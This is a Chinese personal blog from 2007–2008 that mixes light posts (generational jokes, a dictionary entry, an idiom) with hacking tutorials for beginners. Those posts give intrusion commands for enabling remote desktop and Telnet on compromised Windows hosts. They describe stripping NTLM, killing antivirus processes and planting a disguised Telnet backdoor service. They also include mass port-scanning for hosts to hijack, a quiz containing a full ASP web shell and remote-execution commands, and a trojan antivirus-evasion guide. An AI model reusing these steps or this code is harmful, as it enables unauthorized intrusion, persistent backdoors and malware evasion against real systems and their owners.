HK橙色人生–Life In Blogcn

2008.05.12 12:40:00

70后、80后、90后的区别

80后拒绝加班！

90后拒绝上班！ 2.70后喜欢穿七匹狼或者猛龙牌子的衣服。

80后喜欢G-Star之类的。

90后乞丐服，越花越好,越破越好..一个洞时尚，两个洞潮流，三个洞个性... 3.70后唱k的时候只会 ─例如2002年的第一场雪，然后就拼命拉着你喝酒，不让你唱。

Mic霸一般是80后。

90后我们不止会唱，还会跳！ 4.70后的话题除了工作就是股票。

80后的话题更多，有英超、魔兽……

90后QQ等级，QQ秀... 5.70后如果有笔记本，会喜欢到公众场合用。

80后才不会背那么重的东西在身上。

90后只要苹果笔记本，而且不止一台... 6.70后喜欢喝红酒，一般是长城红酒。

80后要么不喝酒，要么就喝啤酒。

90后韩国果汁，日本汽水... 7.70后无论任何时候，看到有站着的领导，都会马上给领导让座。

80后崇尚上下级平等。

90后天上地下，唯我独尊！ 8. 70后娶老婆的时候想娶处女。

80后觉得无所谓，只要相互感情好就可以了。

90后结婚需要感情吗？..需要结婚吗？.. 9.70后喜欢写日记，日记本还是带锁的。

80后喜欢写博客，新浪博客，SOHU博客，喜欢写什么就写什么，反正没人认识你，骂骂人，发发嗲，干什么都行。

90后写博客？太落后了吧？现在是站长时代，去雅虎站长天下直接做站长了，还能赚点广告分成的钱，运气好说不定还可以拿雅虎10万悬赏新站长比赛的奖金。 10.70后希望中国用核弹把上面三个国家（地区）都灭了。

80后希望和平。

90后和我无关！打仗衣服会降价吗？那就打呗~~ 11.70后对服务员态度恶劣，或者言语上调戏女服务员。

80后只在点菜和结帐时会跟服务员说话。

90后从不和waitress说话，只会背后讨论她的衣服很土... 12.70后有存款。

80后有负债。

90后我们有老爸！ 13.70后会把房子买在北京郊区，然后每天早上花一个多小时乘车去上班。

80后喜欢在公司附近租房子，每天骑车或走路去上班，就为了早上多睡一会。

90后我们住哪里都可以，只要MF喜欢... 14.70后结交有背景有地位的人。

80后结交志趣相投的人。

90后我们结交满身文身的MM！ 15.70后周末约客户去吃饭。

80后周末约同学去踢球。

90后一个礼拜７天周末，想做什么做什么！ 16.70后喝酒时喜欢跟别人干杯

80后能喝多少喝多少，喝不下了，怎么也不肯再喝

90后我不是随便喝酒的人，我随便喝起酒来不是人～ 17.70后的家进门要脱鞋。

80后家进门不用脱鞋。

90后我们上床睡觉都不脱鞋！ 18.70后五一、国庆去旅游，然后会在各个景点门口拍下很多V字手势的照片。

80后五一、国庆在家睡觉，或者约朋友去唱k，去旅游，我们只会拍景色。

90后我们天天是五一，国庆....取消五一，么关系... 19.吃饭时，70后喜欢坐在老板旁边

80后最好别坐在老板旁边，那才无拘无束

90后我是老板！ 20.70后跟陌生人在一起的时候喜欢找话题说。

80后不太搭理陌生人，故意找话题不累么？

90后你谁阿，穿这么土，死开～帅哥，交个朋友好嘛？～～ 21.70后即使能做得很好,也认为自己做的一般;

80后能做到一般,就认为自己做得很好;

90后什么都不会做,却以为自己做得最好.

标签:

作者 ccwanwebmaster 阅读全文 | 评论() | 人气() | 引用() | 推荐 | 保存日志

2008.01.17 18:30:00

小子

◎ 小子 xiǎozi

(1) [boy;bloke;chap]∶年幼的男孩子

(2) [son]∶儿子,小儿子

(3) [fellow]∶家伙——含有轻蔑意

(4) [name by which the elder calls the younger]∶长辈称晚辈

标签:

作者 ccwanwebmaster 阅读全文 | 评论() | 人气() | 引用() | 推荐 | 保存日志

2008.01.15 12:45:00

怨天尤人

怨天尤人

成语典故: 天：天命，命运；尤：怨恨，归咎。指遇到挫折或出了问题，一味报怨天，责怪别人。
成语出处: 《论语·宪问》：“不怨天，不尤人，下学而上达，知我者其天乎！”

例句: 便是那愤懑不平之气，放诞无忌惮之言，心中口中，怨天尤人个不了。（明·东鲁古狂生《醉醒石》第六回）

所以个人认为：怨天尤人更坏．这个是出了事情只知道抱怨别人，而不从自己身上找原因来解决问题．

标签:

作者 ccwanwebmaster 阅读全文 | 评论() | 人气() | 引用() | 推荐 | 保存日志

2007.12.11 19:05:00

新手入侵几个问题人要靠自己这点很重要

本文仅对新手菜鸟们提供一些指导，不包含多少技术性的东西。真正“黑客”级别的就不要看了。水平有限请多指教。
1.Q:听人说有经验的黑客仅仅通过一个ping命令就可以判定远程主机的操作系统。这是怎么回事？怎样实现？
A:在ping主机后可以通过TTL返回值大体判定。举例如：
TTL=107(WINNT);
TTL=108(win2000);
TTL=127或128(win9x);
TTL=240或241(linux);
TTL=252(solaris);
TTL=240(Irix);
大家可以在平时多总结一下，但也注意不要过于迷信，因为一个聪明的管理员会手动修改TTL值迷惑入侵者。
2.Q:老是见到shell这个名词，这个shell是什么？还有什么是exploit?
A:呵呵，如果你听到有人说:"哈哈，终于拿到了一个shell!"。这个shell代表的是用户和操作系统"交流"的接口，就像win2000中的cmd。shell的另一种解释是unix下的一种脚本编程语言。exploit一般解释为"溢出"或"漏洞"。我个人认为"溢出"更确切一些。
3.Q:用3389终端服务控制肉鸡好爽，可是对方的管理员如果在主控台的话，会不会看到我对他的控制？有时我很担心。
A:你的控制操作是在后台运行的，表面上察觉不到。但是管理员可以通过ALT+CTRL+DEL找到你，kill掉你的ID也可以发个对话框吓你一跳，所以白天最好不要做这些。
4.Q:我已拿到一台win2000的admin权限，但是只能telnet.我若想用终端控制它该怎样做？
A:Win2000自带一个无人职守安装工具：sysocmgr.exe(应该是这个名字). 你可以telnet进主机后在命令行下这样做：
C:\>echo [Components] >c:\hackart
C:\>echo TSEnable = on >>c:\hackart
C:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\hackart /q /r
等一会就会自动把终端服务安装完毕。"TSEnable=on"的意思是开启终端服务。最后一行的/r参数是决定服务器是否重新启动。若去掉/r参数将自动重启服务器。重新启动后终端服务也会自动启动。详细参数请参考MSDN帮助。
注：当你net start termservice失败后可尝试用此方法。
5.Q:我可以用win98入侵win2000或NT吗？
A:当然可以！也可以入侵unix/linux,前提是你要有跳板才成。WIN98对网络的支持较差，没跳板的话碍手碍脚。
6.Q:像我这样的菜鸟怎样才能逐步提高自己的入侵水平？
A:多看看入侵教程，先从IIS系列入侵开始，逐步向入侵solaris,linux,freebsd,Irix等进化。不要急，慢慢来。
7.Q:我想知道入侵的详细步骤，有许多时候我感到无从下手。
A:一,扫描目标主机(找个好用的扫描器,推荐namp).检查开放的端口，看哪个可以利用。搜集目标服务器信息很重要，然后"对症下药"。
二,看是否存在脆弱帐号和密码，及服务软件漏洞，如wu-ftp版本等等。
三,若目标主机固若金汤，而你又有钱的话，可以试试暴力破解。
四,即使对方只开放80端口，你也可以尝试探测一下IIS或CGI漏洞等等..
进入主机后就不用说了，即使只得到一个user也离root不远了。然后留后门，清除日志...
8.Q:像我这样的大菜鸟用什么扫描工具最好？
A:流光,x-scan,SuperScan等等。

标签:

作者 ccwanwebmaster 阅读全文 | 评论() | 人气() | 引用() | 推荐 | 保存日志

2007.12.11 13:58:00

桌面主题*.theme和*.msstyles 的安装使用

大家从网上下载的桌面主题各式各样，有的只有几百KB，有的可能有几十MB，就是因为它们所包含的内容不一样。有的只有一个 .msstyles 风格文件，有的带了几个色彩配置文件，有的带了 .theme 文件，有的带了鼠标指针、壁纸、声音事件等，笔者甚至见过一个包含了所有内容压缩之后都有上百MB的巨型桌面主题。非常夸张～～

下面就讲讲各种不同的主题该如何安装。

给大家一个小提示，在正常的情况下 .theme 文件和 .msstyles 文件都是有系统默认文件关联的，也就是说双击这两种文件系统都会自动在显示属性中打开，大家可以利用这一点在安装之前先预览该主题或者风格，当然，如果主题还包扩了其他文件的话就要注意其他文件的路径是否对头了，否则是无法正常预览的。

第一种情况：有 .theme 主题文件

这种情况是最容易安装的了，只要保持原主题的目录结构，将 .theme 文件和文件夹复制到 X:\WINDOWS\Resources\Themes\ 目录下就完成安装了。举个最简单的例子，大家在网上下载了一个主题，假定这个主题名叫“Naco”，那么安装后应该是这样的目录结构：

X:\WINDOWS\Resources\Themes\Naco.theme （可无）
X:\WINDOWS\Resources\Themes\Naco\Naco.msstyles
X:\WINDOWS\Resources\Themes\Naco\Shell\xxxx\shellstyle.dll （可无）
.....................

复制好之后然后在桌面上点击右键，选择“属性”打开显示属性窗口。因为有 .theme 主题文件，所以在主题列表中可以看到该主题，选择主题名称，点击应用，Windows就会自动切换到该主题的显示了。如果这个主题有多个色彩方案的话，打开“外观”，在“色彩方案”列表中可以看到可选的色彩方案，选每一项内容都将在上面的预览框中显示实际效果。

第二种情况：没有 .theme 主题文件

还是这个例子，假定主题名叫“Naco”，这个主题只有一个 Naco.msstyles 风格文件和一个 shell 文件夹，shell 文件夹下面有几套色彩方案，或者连 shell 文件夹都没有，那么首先请在 X:\WINDOWS\Resources\Themes 目录下建一个子目录，名字一定要叫做“Naco”，前面说过了，这个目录的名称一定要和风格文件名相同，然后将 Naco.msstyles 文件和 Shell 目录复制到这个子目录里，目录结构是这样的：

X:\WINDOWS\Resources\Themes\Naco\Naco.msstyles
X:\WINDOWS\Resources\Themes\Naco\Shell\xxxx\shellstyle.dll （可无）
.................

打开显示属性窗口。因为没有 .theme 文件，所以在主题列表中是看不到“Naco”主题的，所以要到“外观”页去，正常的话你应该在“窗口和按钮”列表中能找到“Naco”这一项，这里实际上就是风格的列表了。选中“Naco”，如果这个风格有多个色彩方案，那么在下面的色彩方案列表中就会有多于一项内容，选每一项内容都将在上面的预览框中显示实际效果。点击右下方的应用，就能够将风格和色彩方案应用到当前的Windows了。

前面已经讲过了 .theme 是总定义文件以及它的结构，所以，大家可以自己创建一个 .theme 文件来针对没有 .theme 文件的主题。

在“外观”的“窗口和按钮”中选择没有主题文件的风格，点击应用，此时Windows将切换为新指定的风格，切换到“主题”页，此时主题列表中会显示为 XXX（更改），点击“另存为”，将新的 .theme 文件保存到 X:\WINDOWS\Resources\Themes\ 目录里去，当然这里你也可以保存到任何位置，只是保存到系统的目录将更加便于管理。保存之后你就已经建立好一个新的主题了，以后只要选择这个新建的主题就可以使用相应的风格。

在这里有一个技巧，看过第二节就知道，.theme 文件里是有很多定义部分的，所以，在保存 .theme 文件的时候会将当前系统使用的墙纸、鼠标指针、图标、屏保、声音等各种定义全部保存到新建的这个主题文件中间去，因此，大家完全可以不需要去手动编辑 .theme 文件的各项定义，而直接利用这个技巧建立自己个性化的主题。譬如，你可以先将桌面墙纸设为自己最喜欢的图片，调出自己最喜欢的鼠标指针，使用自己最喜欢的声音事件和屏幕保护等等等等，将各个部分调整好之后，“保存为”一个新的主题文件，这样，以后只要选用这个主题文件就能够一步到位了。当然，必须注意的是因为在保存主题文件的时候各种资源都将使用绝对路径，例如鼠标指针和声音文件的引用位置是来自于另外一个主题的目录，因此，一旦某一个文件的实际位置发生了变动，那么再用这个主题的时候Windows就会因为找不到主题里的文件而提示出错，因此，最好的办法是建立一个不容易变动的目录放置这些需要用到的文件，然后再建立主题文件，就不容易发生错误了。

标签:

作者 ccwanwebmaster 阅读全文 | 评论() | 人气() | 引用() | 推荐 | 保存日志

2007.12.10 12:51:00

什么是Telnet

什么是Telnet

对于Telnet的认识，不同的人持有不同的观点，可以把Telnet当成一种通信协议，但是对于入侵者而言，Telnet只是一种远程登录的工具。一旦入侵者与远程主机建立了Telnet连接，入侵者便可以使用目标主机上的软、硬件资源，而入侵者的本地机只相当于一个只有键盘和显示器的终端而已。

Telnet被入侵者用来做什么

(1)Telnet是控制主机的第一手段

在前几节介绍过，如果入侵者想要在远程主机上执行命令，需要建立IPC$连接，然后使用net time命令查看系统时间，最后使用at命令建立计划任务才能完成远程执行命令。虽然这种方法能够远程执行命令，但相比之下，Telnet方式对入侵者而言则会方便得多。入侵者一旦与远程主机建立Telnet连接，就可以像控制本地计算机一样来控制远程计算机。可见，Telnet方式是入侵者惯于使用的远程控制方式，当他们千方百计得到远程主机的管理员权限后，一般都会使用Telnet方式进行登录。

(2)用来做跳板

入侵者把用来隐身的肉鸡称之为“跳板”，他们经常用这种方法，从一个“肉鸡”登录到另一个“肉鸡”，这样在入侵过程中就不会暴露自己的IP地址，这一过程将在第5章中详细介绍。

(3)关于NTLM验证

由于Telnet功能太强大，而且也是入侵者使用最频繁的登录手段之一，因此微软公司为Telnet添加了身份验证，称为NTLM验证，它要求Telnet 终端除了需要有Telnet服务主机的用户名和密码外，还需要满足NTLM验证关系。NTLM验证大大增强了Telnet主机的安全性，就像一只拦路虎把很多入侵者拒之门外。

(4)使用Telnet登录

登录命令：telnet HOST [PORT]

断开Telnet连接的命令：exit

成功地建立Telnet连接，除了要求掌握远程计算机上的账号和密码外，还需要远程计算机已经开启“Telnet服务”，并去除NTLM验证。也可以使用专门的Telnet工具来进行连接，比如STERM，CTERM等工具。

Telnet典型入侵

(1)Telnet典型入侵步骤

步骤一：建立IPC$连接。其中sysback是前面建立的后门账号。

步骤二：开启远程主机中被禁用的Telnet服务。

步骤三：断开IPC$连接。

步骤四：去掉NTLM验证。如果没有去除远程计算机上的NTLM验证，在登录远程计算机的时候就会失败。

不过入侵者会使用各种方法使NTLM验证形同虚设。解除NTLM的方法有很多，下面列出一些常用的方法，来看看入侵者如何去除NTLM验证。

方法一

首先，在本地计算机上建立一个与远程主机上相同的账号和密码。

然后，通过“开始”→“程序”→“附件”找到“命令提示符”，使用鼠标右键单击“命令提示符”，然后选择“属性”，打开后如图所示

在“以其他用户身份运行（U）”前面“打钩”，然后单击“确定”按钮。接着，仍然按照上述路径找到“命令提示符”，用鼠标左键单击打开，得到如图所示对话框，键入“用户名”和“密码”。

单击“确定”按钮后，得到MS-DOS界面，然后用该MS-DOS进行Telnet登录，如图所示。

键入“telnet 192.168.27.128”命令并回车后，在得到的界面中键入“y”表示发送密码并登录。

远程主机为Telnet终端用户打开的Shell，在该Shell中输入的命令将会直接在远程计算机上执行。

比如，键入“net user”命令来查看远程主机上的用户列表，如图所示。


方法二

该方法使用工具NTLM.EXE来去除NTLM验证。首先与远程主机建立IPC$连接，然后将NTLM.EXE拷贝至远程主机，最后通过at命令使远程计算机执行NTLM.EXE。

计划任务执行NTLM.EXE后，便可键入“telnet 192.168.27.128”命令来登录远程计算机。

在该登录界面中键入用户名和密码，如果用户名和密码正确，便会登录到远程计算机，得到远程计算机的Shell。

另外，还可以使用与opentelnet.exe相配套的程序resumetelnet.exe来恢复远程主机的NTLM验证，命令格式为“ResumeTelnet.exe \\\\server sername password”。

resumetelnet.exe关闭了目标主机的Telnet服务，恢复了NTLM验证。

从前面的介绍可以看出，即使计算机使用了NTLM验证，入侵者还是能够轻松地去除NTLM验证来实现Telnet登录。如果入侵者使用23号端口登录，管理员便可以轻易地发现他们，但不幸的是，入侵者通常不会通过默认的23号端口进行Telnet连接。那么入侵者究竟如何修改Telnet端口，又如何修改 Telnet服务来隐蔽行踪呢？下面举一些常见的例子来说明这一过程，并介绍一下完成这一过程所需要的工具。

è X-Scan：用来扫出存在NT弱口令的主机。

è opentelnet：用来去NTLM验证、开启Telnet服务、修改Telnet服务端口。

è AProMan：用来查看进程、杀死进程。

è instsrv：用来给主机安装服务。

（1）AProMan简介

AproMan以命令行方式查看进程、杀死进程，不会被杀毒软件查杀。举个例子，如果入侵者发现目标主机上运行有杀毒软件，会导致上传的工具被杀毒软件查杀，那么他们就会要在上传工具前关闭杀毒防火墙。使用方法如下：

c:\\AProMan.exe -a 显示所有进程

c:\\AProMan.exe -p 显示端口进程关联关系（需Administrator权限）

c:\\AProMan.exe -t [PID] 杀掉指定进程号的进程

c:\\AProMan.exe -f [FileName] 把进程及模块信息存入文件

（2）instsrv简介

instsrv是一款用命令行就可以安装、卸载服务的程序，可以自由指定服务名称和服务所执行的程序。instsrv的用法如下。

安装服务：instsrv <服务名称> <执行程序的位置>

卸载服务：instsrv <服务名称> REMOVE

还有另一款优秀的远程服务管理工具SC。它属于命令行工具，可以在本地对远程计算机上的服务进行查询、启动、停止和删除。它的用法很简单，这里不作介绍了。下面通过实例来介绍入侵者如何实现Telnet登录并留下Telnet后门的过程。

步骤一：扫出有NT弱口令的主机。在X-Scan的“扫描模块”中选中“NT-SERVER弱口令”，如图所示。

然后在“扫描参数中”指定扫描范围为“192.168.27.2到192.168.27.253”，如图2所示。

等待一段时间后。

步骤二：用opentelnet打开远程主机Telnet服务、修改目标主机端口、去除NTLM验证。

无论远程主机是否开启“Telnet服务”，入侵者都可以通过工具opentelnet来解决。比如，通过“opentelnet \\\\192.168.27.129 administrator "" 1 66”命令为IP地址为192.168. 27.129的主机去除NTLM认证，开启Telnet服务，同时又把Telnet默认的23号登录端口改成66号端口。

步骤三：把所需文件（instsrv.exe、AProMan.exe）拷贝到远程主机。

首先建立IPC$，然后通过映射网络硬盘的方法把所需文件拷贝、粘贴到远程计算机的c:\\winnt文件夹中。


步骤四：Telnet登录。

在MS-DOS中键入命令“telnet 192.168.27.129 66”来登录远程主机192.168.27.129。

步骤五：杀死防火墙进程。

如果入侵者需要把类似木马的程序拷贝到远程主机并执行，那么他们会事先关闭远程主机中的杀毒防火墙。虽然这里没有拷贝类似木马的程序到远程主机，但还是要介绍一下这一过程。当入侵者登录成功后，他们会进入到c:\\winnt目录中使用AProMan程序。首先通过命令AProMan –A查看所有进程，然后找到杀毒防火墙进程的PID，最后使用AProMan –t [PID]来杀掉杀毒防火墙。

步骤六：另外安装更为隐蔽的Telnet服务。

为了事后仍然能登录到该计算机，入侵者在第一次登录之后都会留下后门。这里来介绍一下入侵者如何通过安装系统服务的方法来让Telnet服务永远运行。在安装服务之前，有必要了解一下Windows操作系统是如何提供“Telnet服务”的。打开“计算机管理”，然后查看“Telnet服务”属性。

在“Telnet 的属性”窗口中，可以看到其中“可执行文件的路径”指向“C:\\WINNT\\ SYSTEM32\\tlntsvr.exe”。可见，程序tlntsvr.exe就是Windows系统中专门用来提供“Telnet服务”的。也就是说，如果某服务指向该程序，那么该服务就会提供Telnet服务。因此，入侵者可以自定义一个新服务，将该服务指向tlntsvr.exe，从而通过该服务提供的Telnet服务登录，这样做后，即使远程主机上的Telnet服务是被禁用的，入侵者也可以毫无阻碍的登录到远程计算机，这种方法被称之为 Telnet后门。下面就介绍一下上述过程是如何实现的。首先进入instsrv所在目录。

然后使用instsrv.exe建立一个名为“SYSHEALTH”的服务，并把这个服务指向C:\\WINNT z\\SYSTEM32\\tlntsvr.exe，根据instsrv.exe的用法，键入命令“instsrv.exe SYSHEALTH C:\\WINNT\\SYSTEM32\\tlntsvr.exe”。

一个名为“SYSHEAHTH”的服务就这样建立成功了。虽然从表面看上去该服务与远程连接不存在任何关系，但是实际上该服务是入侵者留下的Telnet后门服务。

通过“计算机管理”可以看到该服务已经添加在远程计算机上。入侵者一般会把这个服务的启动类型设置成“自动”，把原来的“Telnet服务”停止并禁用。

通过验证可知，虽然远程主机上的Telnet服务已经被停止并禁用，但入侵者仍然能够通过Telnet来控制远程主机。通过这些修改，即使管理员使用“netstat –n”命令来查看开放端口号也看不出66端口正在提供Telnet服务。

另外，这里顺便介绍一下netstat –n命令。该命令用来查看本地机当前连接情况，如图所示。其中，“Proto”列为当前连接的协议类型，如TCP协议和UDP协议。“Local Address”列为本地主机的IP地址，从图可见，本地主机有两个IP地址，分别为“192.168.0.2”和“192.168.27.1”。 “Foreign Address”列为远程主机IP地址。“State”列为当前连接状态，其中包括ESTABLISHED（已经建立），TIME_WAIT（等待）， SYN_SENT（正在连接）等状态。

常见问题与解答

1．问：虽然获得远程主机的用户名和密码，但是使用opentelnet连接的时候失败，如图所示，为什么？

答：根据返回的错误号“53”可知，目标主机没有启动Server服务，或者没有开放IPC$。

2．问：如何才能抵御Telnet入侵？

答：

保证账号密码的强壮性，防止被暴力破解。

禁用Telnet服务。

由于opentelnet是通过IPC$来实现的，所以关闭IPC$也可以防止一些情况的发生。

安装网络防火墙。

标签:

作者 ccwanwebmaster 阅读全文 | 评论() | 人气() | 引用() | 推荐 | 保存日志

2007.12.10 10:04:00

黑客初级考试卷

一、
http://192.168.0.1
http://xyz.3322.org
http://3232235521
三个连接指向同一目标网站，那么它们分别是什么意义？

二、
常用端口识别
20 21 23
25 80 110
139 443 445

三、
试述下列命令作用
c:\>net use \\211.87.194.121\ipc$ “123456”/user:”administrator”
c:\>net use z: \\211.87.194.121\c$
c:\>net time \\211.87.194.121
c:\>copy abc.exe \\211.87.194.121\admin$\system32

四、
试述下列命令的区别，如何防止该命令在本地或远程运行
c:\>at \\211.87.194.121 21:05 abc.exe
c:\>at 21:05 \\211.87.194.121\admin$\system32\abc.exe

五、
W3SVC日志是什么？分析下面这段日志。
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /MSADC/root.exe /c+dir 403 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /c/winnt/system32/cmd.exe /c+dir 401 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /d/winnt/system32/cmd.exe /c+dir 401 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /HEAD 200 -
分析我酌情给分。

六、
netstat命令有何作用，举出两个参数进行说明。

七、
试述木马的一些基本特征。

八、
如何利用脚本实现对ftp的自动操作？

九、
下面是一个ASP木马，请找出支持这一程序的关键点。
<%@ Language=VBScript %>
<%

Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile

On Error Resume Next

Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

szCMD = Request.Form(".CMD")
If (szCMD <> "") Then

szTempFile = "C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Run">
</FORM>
<PRE>
<%
If (IsObject(oFile)) Then
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>

十、
存在IIS或CGI漏洞，并对脚本有执行权限，如何进行入侵？（只要求叙述到如何上传文件，其他思路会酌情给分）
那么，如何在不打补丁的情况下避免这种攻击的发生？

十一、OSI模型中哪一层上有协议？分别是什么？

十二、观察ping命令的返回包的TTL值，可以了解到什么？

十三、从网关得到采样
目标 IP 192.168.0.1 端口80 源 IP　192.168.0.3 端口 3646
目标 IP 192.168.0.1 端口80 源 IP　192.168.0.3 端口 3647
目标 IP 192.168.0.1 端口69 源 IP　192.168.0.3 端口 69
请问这可能是什么样的会话，采用什么协议，进行什么样的作业？

标签:

作者 ccwanwebmaster 阅读全文 | 评论() | 人气() | 引用() | 推荐 | 保存日志

2007.12.10 09:48:00

S扫描器的使用方法

S扫描器的使用方法
s 扫描器是一款命令行下高速扫描利器，通过最新的瑞星杀毒软件测试
命令: s.exe syn ip1 ip2 端口号 /save
      s.exe tcp ip1 ip2 端口号线程数 /save

s.exe扫描器的使用说明

首先我解释下什么是S扫描器，S扫描器是针对微软ms04045漏洞出的一个扫描，原来作者出这东西
的目的是为了扫描这个漏洞，但现在已经变成我们黑客手中的兵器了，大家也许看过很多如何找肉鸡的
动画或刷QB的动画，那些动画里面很多都是用S扫描器来扫描肉鸡或别人电脑所开放的端口及一些漏洞，
都用这工具的好处是它的扫描速度实在是一个字---强！今天我就来教下大家如何使用S扫描器。

简单说明下它的用处：

S扫描器是一个简单的使用两种常用的扫描方式进行端口扫描的端口扫描器程序.
可实现的功能是:
1.两种不同的扫描方式(SYN扫描和一般的connect扫描)
2.可以扫描单个IP或IP段所有端口
3.可以扫描单个IP或IP段单个端口
4.可以扫描单个IP或IP段用户定义的端口
5.可以显示打开端口的banner
6.可将结果写入文件
7.TCP扫描可自定义线程数

用法:scanner TCP/SYN StartIP [EndIP] Ports [Threads] [/Banner] [/Save]

参数说明:
TCP/SYN -> TCP方式扫描或SYN方式扫描(SYN扫描需要在win 2k或以上系统才行),SYN扫描对本机无效
StartIP -> 起始扫描的IP
EndIP -> 结束扫描的IP,可选项,如果这一项没有，就只是对单个IP扫描
Ports -> 可以是单个端口，连续的一段端口或非连续的端口
Threads -> 使用最大线程数去扫描(SYN扫描不需要加这一项),不能超过1024线程
/Banner -> 扫描端口时一并将Banner显示出来,这一选项只对TCP扫描有效
/Save -> 将结果写入当前目录的Result.txt文件中去

打开S扫描器，下面我举几个例子演示下S扫描器的主要几个作用。

例子一:
S TCP 218.80.12.1 218.80.12.123 80 512
TCP扫描218.80.12.1到218.80.12.123这IP段中的80端口,最大并发线程是512

例子二：
S TCP 218.80.12.1 218.80.12.123 21,5631 512 /Banner
TCP扫描218.80.12.1到218.80.12.123这IP段中的21和5631端口,最大并发线程是512,并显示Banner

例子三：
S TCP 218.80.12.1 218.80.12.12 1-200 512
TCP扫描218.80.12.1到218.80.12.12这IP段中的1到200端口,最大并发线程是512

例子四：
S TCP 218.80.12.7 1-200 512
TCP扫描218.80.12.7这IP中的1到200端口,最大并发线程是512

例子五：
S SYN 218.80.12.7 1-65535 /Save
SYN扫描218.80.12.7这IP中的1到65535端口,将结果写入Result.txt
扫描结束后Result.txt就存放在你的S扫描器所在的目录里。刚才扫描的东西都在里面。

例子六：
S SYN 218.80.12.1 218.80.12.255 21 /Save
SYN扫描218.80.12.1到218.80.12.255这IP段中的21端口,将结果写入Result.txt
这个我重点说明一下，因为这条命令就是专门用来找肉鸡的，扫描一个IP段有没有开3389的或1433的
我示范下：S SYN 218.80.1.1 218.80.255.255 3389 /Save


注意:
1.SYN扫描是很依赖于扫描者和被扫描者的网速的,如果你是内网的系统，那你不一定可以使用SYN扫描的
，因为你的网关的类型会决定内网系统是否能进行SYN扫描.如果你的配置较低的话，我也不推荐使用
SYN扫描.SYN扫描速度是比TCP扫描的速度快很多的，但在稳定性方面却不是太好，所以自己决定使用
哪种模式进行扫描。
2.SYN扫描不需要线程那个参数，请看上面例子5和6
3.TCP扫描的最大并发线程不能超过1024.
4.使用SYN模式扫描，不能扫描Banner,具体为什么不能，请查看有关SYN的资料

5.内网用户的朋友可以用tcp扫描

关于S.exe 的用法和错误解释

S扫描器扫描命令是:
文件名参数起始IP      结束IP        要扫描的端口保存
s      SYN 61.0.0.0    61.255.255.255 1433          save

1433是SQL server 服务器端口
8080是代理服务器端口

标签:

作者 ccwanwebmaster 阅读全文 | 评论() | 人气() | 引用() | 推荐 | 保存日志

2007.12.10 09:24:00

从基础讲免杀的精典文章！一共七课

1.木马的免杀[入门]


一.关于免杀的来源

为了让我们的木马在各种杀毒软件的威胁下活的更久.

二.什么叫免杀和查杀

可分为二类:

1.文件免杀和查杀:不运行程序用杀毒软件进行对该程序的扫描，所得结果。

2.内存的免杀和查杀:判断的方法1>运行后,用杀毒软件的内存查杀功能.

                                          2>用OD载入,用杀毒软件的内存查杀功能.

三.什么叫特征码

1.含意:能识别一个程序是一个病毒的一段不大于64字节的特征串.

2.为了减少误报率,一般杀毒软件会提取多段特征串,这时,我们往往改一处就可达到

免杀效果,当然有些杀毒软件要同时改几处才能免杀.(这些方法以后详细介绍)

3.下面用一个示意图来具体来了解一下特征码的具体概念

四.特征码的定位与原理


1.特征码的查找方法:文件中的特征码被我们填入的数据（比如0）替换了，那杀毒软

件就不会报警，以此确定特征码的位置

2.特征码定位器的工作原理:原文件中部分字节替换为0，然后生成新文件，再根据杀

毒软件来检测这些文件的结果判断特征码的位置

五.认识特征码定位与修改的工具

1.CCL(特征码定位器)

2.OOydbg (特征码的修改)

3.OC用于计算从文件地址到内存地址的小工具.

4.UltaEdit-32(十六进制编辑器,用于特征码的手工准确定位或修改)


六.特征码修改方法


特征码修改包括文件特征码修改和内存特征码修改，因为这二种特征码的修改方法

是通用的。所以就对目前流行的特征码修改方法作个总节。



方法一:直接修改特征码的十六进制法

1.修改方法:把特征码所对应的十六进制改成数字差1或差不多的十六进制.

2.适用范围:一定要精确定位特征码所对应的十六进制,修改后一定要测试一下能

否正常使用.

方法二:修改字符串大小写法

1.修改方法:把特征码所对应的内容是字符串的,只要把大小字互换一下就可以了.

2.适用范围:特征码所对应的内容必需是字符串,否则不能成功.

方法三:等价替换法

1.修改方法:把特征码所对应的汇编指令命令中替换成功能类拟的指令.

2.适用范围:特征码中必需有可以替换的汇编指令.比如JN,JNE 换成JMP等.

如果和我一样对汇编不懂的可以去查查8080汇编手册.

方法四:指令顺序调换法

1.修改方法:把具有特征码的代码顺序互换一下.

2.适用范围:具有一定的局限性,代码互换后要不能影响程序的正常执行


方法五:通用跳转法

1.修改方法:把特征码移到零区域(指代码的空隙处),然后一个JMP又跳回来执行.

2.适用范围:没有什么条件,是通用的改法,强烈建议大家要掌握这种改法.

七.木马免杀的综合修改方法

文件免杀方法：

1.加冷门壳

2.加花指令

3.改程序入口点

4.改木马文件特征码的5种常用方法

5.还有其它的几种免杀修改技巧

内存免杀方法：

修改内存特征码：

方法1>直接修改特征码的十六进制法

方法2>修改字符串大小写法

方法3>等价替换法

方法4>指令顺序调换法

方法5>通用跳转法





2.木马的免杀[学用CLL定位文件和内存特怔码]


1.首先我们来看下什么叫文件特征码.

一般我们可以这样认为，一个木马程序在不运行的情况下，用杀毒软件查杀，若报警为病毒，说明存在该查毒软件的文件特征码的。

2.特征码的二种定位方法.

手动定位和自动定位

3.文件特征码的定位技巧.

通常用手动确定大范围，用自动精确定位小范围.

下面分别用瑞星和卡巴为例，实例演示并结合手动定位和自动定位二种方法来准确定位文件特征码。要定位的对像以下载者为例。

用卡巴来定位文件特征码

⑴.手动定位：


